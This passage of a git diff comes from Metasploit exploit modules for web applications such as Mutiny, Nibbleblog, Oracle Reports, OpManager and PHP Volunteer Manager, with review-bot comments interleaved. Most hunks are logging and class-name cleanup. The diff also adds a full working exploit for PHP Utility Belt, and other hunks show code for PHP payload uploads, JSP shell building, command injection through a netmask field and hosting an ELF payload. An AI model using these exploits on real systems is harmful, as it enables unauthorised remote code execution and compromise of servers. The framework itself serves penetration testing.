@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index be3bcfea1d..c42d61c2cf 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 75c7502c84..e79e6b15eb 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" - print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") + print_status("Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.body =~ /uplod d0n3 in SAME file/ - print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") + print_good("Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 
diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1882bd0b24..5b37159161 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload payload # - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { @@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from server, will not continue.") + print_error("No response from server, will not continue.") return end # # Run payload # - print_status("#{peer} - Requesting '#{php_fname}'") + print_status("Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler diff --git a/modules/exploits/multi/http/moodle_cmd_exec.rb b/modules/exploits/multi/http/moodle_cmd_exec.rb index fa019366ef..8b1ac0a3f4 100644 --- a/modules/exploits/multi/http/moodle_cmd_exec.rb +++ b/modules/exploits/multi/http/moodle_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 61272300d7..ec129c1f43 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - vprint_status("#{peer} - Sending check...") + vprint_status("Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload...") + print_status("Sending payload...") http_send_cmd(payload.encoded) end diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 8b06d3c753..8dee91cb69 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -98,20 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote ] unless not @netmask_eth0 cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/ - print_status("#{peer} - Restoring Network Information and Cleanup...") + print_status("Restoring Network Information and Cleanup...") begin session.shell_command_token(cmds.join(" ; ")) rescue - print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:") + print_error("Automatic restore and cleanup didn't work, please use these commands:") cmds.each { |cmd| print_warning(cmd) } end - print_good("#{peer} - Restoring and Cleanup successful") + print_good("Restoring and Cleanup successful") end def start_web_service - print_status("#{peer} - Setting up the Web Service...") + print_status("Setting up the Web Service...") if datastore['SSL'] ssl_restore = true 
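Review bot: In mutiny_subnetmask_exec.rb hunk `@@ -98,20`, `print_good("Restoring and Cleanup successful")` sits after the `begin`/`rescue` block, so it is printed even when the `rescue` branch has just reported that restore and cleanup failed. That leaves the operator with a success line although the target's network settings and the dropped file may not have been restored. Moving the `print_good` call inside the `begin` block, directly after `session.shell_command_token(cmds.join(" ; "))`, prints it only when the command ran. The bare `rescue` could also name the exception class it expects. The method begins outside the hunk.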
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote resource_uri = '/' + @elfname + '.elf' service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}" - print_status("#{peer} - Starting up our web service on #{service_url} ...") + print_status("Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote # wait for the data to be sent def wait_linux_payload - print_status("#{peer} - Waiting for the victim to request the ELF payload...") + print_status("Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) @@ -146,23 +146,23 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{peer} - Giving time to the payload to execute...") + #print_status("Giving time to the payload to execute...") #select(nil, nil, nil, 20) unless session_created? - print_status("#{peer} - Shutting down the web service...") + print_status("Shutting down the web service...") stop_service end # Handle incoming requests from the target def on_request_uri(cli, request) - vprint_status("#{peer} - on_request_uri called, #{request} requested") + vprint_status("on_request_uri called, #{request} requested") if (not @elf_data) - print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!") + print_error("A request came in, but the ELF archive wasn't ready yet!") return end - print_good("#{peer} - Sending the ELF payload to the target...") + print_good("Sending the ELF payload to the target...") @elf_sent = true send_response(cli, @elf_data) end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Login with the provided credentials...") + print_status("Login with the provided credentials...") res = send_request_cgi({ 'method' => 'POST', 
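Review bot: In mutiny_subnetmask_exec.rb hunk `@@ -146,23`, the commit edits a commented-out statement, `#print_status("Giving time to the payload to execute...")`, that sits next to another commented-out line, `#select(nil, nil, nil, 20) unless session_created?`. Both are dead code; deleting them is cleaner than keeping them in step with the logging change, and version control keeps the history. `wait_linux_payload` begins outside the hunk.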
@@ -194,13 +194,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ - print_good("#{peer} - Login successful") + print_good("Login successful") session = $1 else fail_with(Failure::NoAccess, "#{peer} - Unable to login in Mutiny") end - print_status("#{peer} - Leaking current Network Information...") + print_status("Leaking current Network Information...") res = send_request_cgi({ 'method' => 'GET', @@ -216,16 +216,16 @@ class Metasploit3 < Msf::Exploit::Remote static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "") static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "") static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "") - print_good("#{peer} - Information leaked successfully") + print_good("Information leaked successfully") else - print_error("#{peer} - Error leaking information, trying to exploit with random values") + print_error("Error leaking information, trying to exploit with random values") end if target.name =~ /CMD/ injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3)) injection << "; #{payload.encoded}" else - print_status("#{peer} - Generating the ELF Payload...") + print_status("Generating the ELF Payload...") @elf_data = generate_payload_exe @elfname = Rex::Text.rand_text_alpha(3+rand(3)) service_url = start_web_service @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end - print_status("#{peer} - Exploiting Command Injection...") + print_status("Exploiting Command Injection...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/nas4free_php_exec.rb b/modules/exploits/multi/http/nas4free_php_exec.rb index 2de2f53e56..95e308519c 100644 
--- a/modules/exploits/multi/http/nas4free_php_exec.rb +++ b/modules/exploits/multi/http/nas4free_php_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 5d52ed78f7..117e37cc8b 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 290931c1c4..3173aaa9f6 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 
@@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Nibbleblog.") + vprint_good("Authenticated with Nibbleblog.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), @@ -144,14 +144,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to upload payload.') end - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_fname) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index 885c5052db..646a6d6b59 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb 
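Review bot: `vprint_status("Authenticating using #{username}:#{password}")` in the `@@ -103,13 +103,13 @@` hunk of nibbleblog_file_upload.rb writes the cleartext password to the console, and from there into any console log or saved terminal output. Log the account name only, e.g. `vprint_status("Authenticating as #{username}")`. The same pattern is in php_volunteer_upload_exec.rb (`@@ -194,49 +194,49 @@`, both the `Login failed with` and `Login successful with` lines) and in qdpm_upload_exec.rb (`@@ -231,10 +231,10 @@`, `Attempt to login with '#{user}:#{pass}'`). This commit already edits each of those lines, so the password can be dropped from them in the same pass.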
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index d46dd09a10..d8a570bf4c 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index d18396ba80..e12572648c 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 4be4d81ca7..d4a5f60cac 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 1a097fd6bb..0fd826a77b 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index 16676fc6bd..2b1876fd2f 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. - print_status("#{peer} - Replacing Tomcat context file") + print_status("Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote }) else # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directories") + print_status("Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', 
@@ -117,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end - print_status("#{peer} - Executing payload, wait for session...") + print_status("Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] - print_error("#{peer} - Failed to get a shell, let's try one more time") + print_error("Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 8c3f73bd2c..4b8bf6c40b 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML 
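Review bot: The status line in the `@@ -117,14 +117,14 @@` hunk of opmanager_socialit_file_upload.rb is still assembled with `+` and an explicit `.to_s` across two source lines. Since the line is being rewritten anyway, one interpolated string reads better: `print_status("Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")`. The enclosing method starts above the hunk.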
@@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - vprint_good "#{peer} - Windows install detected " + vprint_good "Windows install detected " path = $1.gsub("\\", "/") - vprint_status "#{peer} - Path: #{path}" + vprint_status "Path: #{path}" elsif res.body =~ /\/(.*)\/showenv/ - vprint_good "#{peer} - Linux install detected" - vprint_status "#{peer} - Path: #{$1}" + vprint_good "Linux install detected" + vprint_status "Path: #{$1}" else return Exploit::CheckCode::Safe end @@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.downcase.exclude?("<html>") - vprint_good "#{peer} - URLPARAMETER is vulnerable" + vprint_good "URLPARAMETER is vulnerable" return Exploit::CheckCode::Vulnerable else - vprint_status "#{peer} - URLPARAMETER is not vulnerable" + vprint_status "URLPARAMETER is not vulnerable" return Exploit::CheckCode::Safe end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote @payload_dir = datastore['PAYDIR'] @local_path = "" - print_status "#{peer} - Querying showenv!" + print_status "Querying showenv!" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"), 'method' => 'GET', 
@@ -127,17 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Windows install detected " + print_good "Query succeeded!" + print_status "Windows install detected " @local_path = $1.gsub("\\", "/") - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" elsif res.body =~ /\/(.*)\/showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Linux install detected" + print_good "Query succeeded!" + print_status "Linux install detected" @local_path = $1 - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" else - print_status "#{peer} - Query failed" + print_status "Query failed" fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else @@ -145,14 +145,14 @@ class Metasploit3 < Msf::Exploit::Remote end if datastore['EXTURL'].blank? - print_status "#{peer} - Hosting payload locally ..." + print_status "Hosting payload locally ..." begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error end exec_payload else - print_status "#{peer} - Using external url for payload delivery ..." + print_status "Using external url for payload delivery ..." @payload_url = datastore['EXTURL'] upload_payload exec_payload @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def upload_payload - print_status "#{peer} - Uploading payload ..." + print_status "Uploading payload ..." path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"), @@ -191,9 +191,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good "#{peer} - Payload hopefully uploaded!" + print_good "Payload hopefully uploaded!" else - print_status "#{peer} - Payload upload failed" + print_status "Payload upload failed" end end 
@@ -202,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote gen_payload_name = rand_text_alpha(8+rand(8)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) - print_status "#{peer} - Building JSP shell ..." + print_status "Building JSP shell ..." len = encoded_pl.length if len >= 60000 #java string size limit ~60k workaround - print_status "#{peer} - Adjusting shell due to payload size" + print_status "Adjusting shell due to payload size" pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true @@ -252,8 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end def exec_payload - print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") + print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), @@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good("#{peer} - Payload executed!") + print_good("Payload executed!") else - print_status("#{peer} - Payload execution failed") + print_status("Payload execution failed") end end end diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index 3db627caf4..21e9ab5a64 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Unknown 
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote end # upload PHP payload to images/[fname] - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) @@ -146,13 +146,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (images/#{@fname})") + print_status("Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 5ff2a02952..a5d142906b 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb new file mode 100644 index 0000000000..9f499e41a3 --- /dev/null +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb 
@@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PHP Utility Belt Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in PHP Utility Belt, + which is a set of tools for PHP developers and should not be installed in a + production environment, since this application runs arbitrary PHP code as an + intended functionality. + }, + 'Author' => + [ + 'WICS', # initial discovery + 'Jay Turla' # msf + ], + 'References' => + [ + ['EDB', '38901'], + ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo + ], + 'DisclosureDate' => 'Dec 08 2015', + 'License' => MSF_LICENSE, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true + }, + 'Targets' => + [ + ['PHP Utility Belt', {}] + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']) + ], self.class) + end + + def check + txt = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{txt};") + + if res && res.body.include?(txt) + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + http_send_command(payload.encoded) + end + + def http_send_command(cmd) + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => { + 'code' => cmd + } + ) + end + +end diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 8f8a58f69d..096812613d 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb 
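Review bot: `check` in the new php_utility_belt_rce.rb returns `Exploit::CheckCode::Safe` whenever `res` is nil (the code itself guards for that case), so a target that did not answer is reported as a negative finding. Other modules in this diff, pandora_upload_exec.rb and processmaker_exec.rb, return `Exploit::CheckCode::Unknown` when the connection fails; add `return Exploit::CheckCode::Unknown unless res` before the `res.body.include?(txt)` test. `http_send_command` also has no comment; a one-line header saying that it posts `cmd` as the `code` form field to TARGETURI and returns the response would document the only helper in the file.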
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a cookie, bail! if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 - vprint_status("#{peer} - Found cookie: #{cookie}") + vprint_status("Found cookie: #{cookie}") else return nil end 
@@ -194,49 +194,49 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] cookie = login(base, username, password) if cookie.nil? - print_error("#{peer} - Login failed with \"#{username}:#{password}\"") + print_error("Login failed with \"#{username}:#{password}\"") return end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") # Take a snapshot of the uploads directory # Viewing this doesn't actually require the user to login first, # but we supply the cookie anyway to act more like a real user. - print_status("#{peer} - Enumerating all the uploads...") + print_status("Enumerating all the uploads...") before = peek_uploads(base, cookie) if before.nil? - print_error("#{peer} - Unable to enumerate original uploads") + print_error("Unable to enumerate original uploads") return end # Upload our PHP shell - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alpha(rand(10)+6) + '.php' desc = rand_text_alpha(rand(10)+5) php = %Q|<?php #{payload.encoded} ?>| res = upload(base, cookie, fname, php, desc) if res.nil? or res.body !~ /The file was successfuly uploaded/ - print_error("#{peer} - Failed to upload our file") + print_error("Failed to upload our file") return end # Now that we've uploaded our shell, let's take another snapshot # of the uploads directory. - print_status("#{peer} - Enumerating new uploads...") + print_status("Enumerating new uploads...") after = peek_uploads(base, cookie) if after.nil? - print_error("#{peer} - Unable to enumerate latest uploads") + print_error("Unable to enumerate latest uploads") return end # Find the filename of our uploaded shell files = get_my_file(before.body, after.body) if files.empty? - print_error("#{peer} - No new file(s) found. 
